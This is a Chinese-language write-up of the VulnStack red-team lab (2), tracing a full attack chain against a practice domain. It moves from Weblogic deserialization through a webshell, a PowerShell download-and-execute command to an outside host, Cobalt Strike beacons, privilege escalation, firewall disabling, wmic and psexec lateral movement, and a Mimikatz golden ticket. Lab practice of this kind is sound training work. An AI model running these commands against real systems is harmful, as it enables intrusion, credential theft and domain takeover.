靶场下载地址:漏洞详情
环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园
此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC
第一步:信息收集(模拟黑盒测试)
已知WEB机的IP地址,用syn包进行扫描。
nmap -sS -v 192.168.111.80
获得开放端口
WEB服务器:
Nmap scan report for 192.168.111.80
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn Samba服务 存在爆破/未授权访问/远程命令执行漏洞
445/tcp open microsoft-ds smb服务 ms17-010/端口溢出漏洞
1433/tcp open ms-sql-s 存在mssql服务 存在爆破/注入/SA弱口令
3389/tcp open ms-wbt-server 存在远程桌面
7001/tcp open afs3-callback weblogic漏洞
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 00:0C:29:68:D3:5F (VMware)
whatWEB扫描
whatweb http://192.168.111.80:7001
得到信息:
http://192.168.111.80:7001 [404 Not Found]
Country[RESERVED][ZZ], IP[192.168.111.80],
Java[2.1][Servlet/2.5],
Title[Error 404--Not Found],
X-Powered-By[Servlet/2.5 JSP/2.1]
观察知道这是一个java开发的WEB,那就扫扫看有没有java类的漏洞
工具地址:GitHub - rabbitmask/WeblogicScan: Weblogic一键漏洞检测工具,V1.5,更新时间:20200730
利用到WeblogicScan来扫描
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
得到漏洞信息:
[192.168.111.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.111.80:7001] Weblogic console address is exposed! The path is: http://192.168.111.80:7001/console/login/LoginForm.jsp
[+] [192.168.111.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.111.80:7001/uddiexplorer/
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3248
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3506
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[-] [192.168.111.80:7001] weblogic not detected CVE-2019-2890
发现两个java序列化漏洞
扫描WEB目录:
dirb http://192.168.111.80:7001
获得信息
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 10 02:14:41 2022
URL_BASE: http://192.168.111.80:7001/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
---- Scanning URL: http://192.168.111.80:7001/ ----
+ http://192.168.111.80:7001/console (CODE:200|SIZE:416)
==> DIRECTORY: http://192.168.111.80:7001/uddi/
DIRECTORY: http://192.168.111.80:7001/uddiexplorer/
---- Entering directory: http://192.168.111.80:7001/uddi/ ----
==> DIRECTORY: http://192.168.111.80:7001/uddi/images/
---- Entering directory: http://192.168.111.80:7001/uddi/images/ ----
-----------------
END_TIME: Sun Apr 10 02:15:21 2022
DOWNLOADED: 13836 - FOUND: 1
都去访问一下就知道,uddi目录是没有权限进入的,但是uddiexplorer可以进入,这里将成为我们大马的安家之地。
第二步 漏洞利用:
使用java 反序列化终极测试工具测试漏洞
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip - 开发实例、源码下载 - 好例子网
执行命令权限administrator,webshell上传一个jsp大马,利用文件管理寻找前面分析的uddiexplorer这个目录。
上传shell
上传的冰蝎我没成功,无法连接,但是我上传其他的大马。
github有很多,搜索关键词shell就可以找到!
可能是版本问题,java,或者命令行转义问题等。。。
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://172.16.250.3:8022/a')
这条命令的CS利用,我并没有成功。但是我发现file upload是可以用的,于是我决定用beacon.exe来获取shell,上线CS
第三步 上线CS:
CS制作小马
获得一个beacon.exe
利用浏览器的大马上传这个beancon.exe 到 windows/temp/
然后进入cmd执行里执行这句话:
.... 发现CS就上线了
提权:
利用漏洞提权:
jsp大马中
----------------
先输入这条代码:
systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
下面是漏洞对照表:
----------------------------------------
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
MS14-070 [KB2989935] [Kernel Driver] (2003)
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy] (2003/XP)
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 [KB2592799] [AFD.sys] (2003/XP)
MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008/7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
随便找个漏洞的exp来提权,我这里就跳过上传步骤了,直接到CS上线
Win64.exe是exp
CS下执行找个:
shell C:\Windows\Temp\Win64.exe "C:\Windows\Temp\beacon5.exe"
执行后CS上线
域信息收集
ipconfig /all
查看域名 net config workstation
关闭防火墙 netsh advfirewall set allprofiles state off
查看有几个域 net view /domain
查看域内主机 nei view
查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员 net group "domain admins" /domain
查看域控 net group "domain controllers" /domain
Portscan
然后在tagert里面psexec上线DC的CS
接下来,讲讲如何利用CS做socks4a 来获取AD机器Cs上线
一样的,上传这个beacon.exe 到AD机上,WEB机上用IPC来vmic命令远程执行
命令如下
shell wmic /node:10.10.10.10 /user:administrator /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"
user可以改成de1ay,改谁就获得谁CS上线的权限
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
cs的DUmp hashs 和 Run Mimikatz 获得KRBTGT的hash值和域的SID
Golden Ticket 就是黄金票据。
制作完成后,在tagert上线时候
即使AD机改了管理员密码,你依然可以利用这个票据来获得管理员权限上线AD机
参考:
【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园